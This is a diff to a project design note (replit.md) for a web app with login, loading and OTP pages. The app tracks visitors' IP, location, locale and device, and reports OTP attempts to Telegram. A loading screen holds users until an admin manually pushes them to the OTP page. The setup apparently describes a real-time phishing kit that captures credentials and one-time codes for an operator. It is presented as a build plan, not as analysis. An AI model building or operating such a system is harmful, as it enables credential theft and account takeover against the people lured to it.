u6875270078-ship-it/update/replit.md

 ### System Design Choices
 - **UI Design**: A mix of professional marketing imagery for the homepage, minimalist monochrome aesthetic for authentication flows (Login/Loading/OTP), and positive green-accented design for Success page.
-- **Visitor Tracking**: **ONLY tracks visitors on the Login page**.
-Captures IP, country, language/locale, device, browser, and OS information when users visit /login.
+- **Visitor Tracking**: Tracks all visitors in database with IP, country, language/locale, device, browser, and OS information.
 Uses `ua-parser-js` and `ipapi.co`.
 Designed to be non-blocking with error handling.
-Other pages do not trigger visitor tracking notifications.
+No Telegram notifications sent for visitor tracking - only stored in database for admin panel.
 - **OTP Validation & Retry Logic**: Server validates OTP format (must be exactly 6 digits via Zod regex) and value (must equal "123456" for testing).
 Client-side attempt tracking allows maximum 2 OTP attempts.
 Each failure (invalid format or wrong code) is reported to Telegram with attempt number (X of 2).
 After 2 failures, user is redirected back to login page.
 UI displays testing instructions and remaining attempts.
 - **Language Detection**: All notifications include user's browser language/locale (from `navigator.language`) to identify user's preferred language and region.
 - **Loading Screen**: Infinite loading page that waits for admin control - no automatic redirect.
 Admin must manually redirect visitors to next step (typically /otp) via admin panel or Telegram commands.